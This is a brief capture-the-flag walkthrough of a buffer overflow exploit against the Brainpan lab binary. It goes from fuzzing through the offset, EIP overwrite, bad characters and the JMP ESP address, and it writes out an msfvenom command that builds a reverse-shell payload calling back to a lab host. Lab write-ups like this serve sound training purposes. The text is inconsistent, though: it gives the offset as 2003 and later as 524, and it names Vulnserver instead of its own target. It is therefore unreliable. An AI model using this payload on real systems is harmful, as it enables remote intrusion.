Brainpan Bufferoverflow Walkthrough

walkthrough
bufferoverflow
#1

1. Fuzzing

Total length of the buffer is 2700 where the application crashed and overwritten with A’s bytes.

registers

2. Finding the offset

pattern_create.rb -l 3000

offsetcalc.py

Generated 3000 offset of strings so we can find the correct length of our offset.

let’s execute offsetcalc.py

EIP has been replaced with our generated offset strings.

eip

EIP: 35724134

We found the offset at 2003.

3. Overwriting the EIP

But to verify 524 we’re gonna add 4 more B’s (Bytes) to see if it replace EIP with B’s.

offsetverify.py

It has successfully overwritten EIP with 42424242 which is B’s that means our length to offset is correct.

registers

4. Finding bad characters

badchars.py

You will need to right click on the ESP register and select “Follow in Dump” . You should notice a little bit of movement in the bottom left corner of the program. If you look carefully, you should see all of your bytes in order starting with 01, 02, 03, etc and ending with FF. If a bad character were present, it would seem out of place. Luckily for us, there are no bad characters in the Vulnserver program. Notice below how all of our numbers appear perfect and in order:

ESP Stack Register

registers

Follow ESP in Dump

dump

In this scenario, we would need to mark down every missing character for later shellcode development. However, the only bad character we need to worry about with brainpan.exe is x00. Now to find the right module…

5. Finding the right module

JMP ESP = \xff\xe4

!mona modules
!mona find -s “\xff\xe4” -m brainpan.exe

return address: 0x311712f3 (To verify that you have found correct return address follow me)

Run immunity again and attach brainpan.exe and then click on the far right arrow.

immunity

Then search for “0x311712f3” (or the return address you found)

That should bring up your return address, FFE4, JMP ESP location. Once you’ve found it, hit F2 and the address should turn baby blue, indicating that we have set a breakpoint.

immunity

Now, run jmptostack.py and play the execution in immunity. You’ll see the EIP has been replaced with our return address.

6. Generating shellcode

msfvenom -p windows/shell_reverse_tcp LPORT=1337 LHOST=192.168.10.7 -b “\x00” -f py

exploit.py

I have also added 32 “\x90″s to the shellcode variable. This is standard practice. The x90 byte is also known as the NOP, or no operation. It literally does nothing. However, when developing exploits, we can use it as padding. There are instances where our exploit code can interfere with our return address and not run properly. To avoid this interference, we can add some padding in-between the two items.

7. Gaining root!

1 Like